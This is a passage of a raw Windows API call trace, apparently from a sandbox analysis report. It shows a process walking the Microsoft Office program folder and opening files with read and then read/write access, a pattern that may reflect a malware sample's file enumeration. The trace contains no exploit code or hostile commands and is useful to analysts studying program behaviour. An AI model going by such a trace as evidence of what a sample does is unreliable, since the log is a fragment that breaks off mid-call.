dwReserved0=0x311d0402, dwReserved1=0x584d8cec, cFileName="FileSystemMetadata.xml", cAlternateFileName="FILESY~1.XML")) returned 1 [0098.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0098.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0098.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0098.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0098.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0098.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0098.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0098.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0098.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0098.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0098.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0098.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0098.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0098.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0098.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0098.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0098.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0098.272] AreFileApisANSI () returned 1 [0098.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml", lpUsedDefaultChar=0x0) returned 57 [0098.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0098.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0098.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0098.273] AreFileApisANSI () returned 1 [0098.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0098.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 57 [0098.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0098.274] GetFileType (hFile=0x420) returned 0x1 [0098.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0098.274] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.274] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.275] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.275] CloseHandle (hObject=0x420) returned 1 [0098.275] AreFileApisANSI () returned 1 [0098.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0098.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 57 [0098.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0098.275] GetFileType (hFile=0x420) returned 0x1 [0098.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0098.276] CloseHandle (hObject=0x420) returned 1 [0098.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0098.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0098.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0098.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0098.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0098.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0098.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0098.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0098.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0098.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0098.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0098.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0098.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0098.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0098.277] AreFileApisANSI () returned 1 [0098.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0098.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 57 [0098.277] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x831d63af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83543a09, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x119)) returned 1 [0098.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0098.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0098.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0098.277] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.277] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.277] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9e7b530, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa146f18e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xda9a8629, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Office16", cAlternateFileName="")) returned 1 [0098.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0098.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0098.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0098.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0098.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0098.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0098.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0098.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0098.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0098.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0098.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.279] AreFileApisANSI () returned 1 [0098.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Office16", lpUsedDefaultChar=0x0) returned 43 [0098.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0098.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0098.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.279] AreFileApisANSI () returned 1 [0098.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0098.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67240 [0098.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x67240, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16") returned 43 [0098.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16" (normalized: "c:\\program files\\microsoft office\\office16"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.279] GetLastError () returned 0x5 [0098.279] GetLastError () returned 0x5 [0098.279] SetLastError (dwErrCode=0x5) [0098.279] GetLastError () returned 0x5 [0098.279] SetLastError (dwErrCode=0x5) [0098.280] GetLastError () returned 0x5 [0098.280] SetLastError (dwErrCode=0x5) [0098.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67240 | out: hHeap=0x20000) returned 1 [0098.280] AreFileApisANSI () returned 1 [0098.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0098.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67240 [0098.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x67240, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16") returned 43 [0098.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16" (normalized: "c:\\program files\\microsoft office\\office16"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.280] GetLastError () returned 0x5 [0098.280] GetLastError () returned 0x5 [0098.280] SetLastError (dwErrCode=0x5) [0098.280] GetLastError () returned 0x5 [0098.280] SetLastError (dwErrCode=0x5) [0098.280] GetLastError () returned 0x5 [0098.280] SetLastError (dwErrCode=0x5) [0098.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67240 | out: hHeap=0x20000) returned 1 [0098.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0098.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0098.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0098.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a430 [0098.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0098.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0098.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0098.281] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf982bd9c, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf982bd9c, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="PackageManifests", cAlternateFileName="PACKAG~1")) returned 1 [0098.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0098.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0098.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0098.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0098.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0098.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0098.282] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78350 [0098.283] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9e7b530, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa146f18e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xda9a8629, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.283] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd502d600, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0xd9e7b530, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd502d600, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x2a9c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OSPP.HTM", cAlternateFileName="")) returned 1 [0098.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0098.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.283] HeapFree (in: 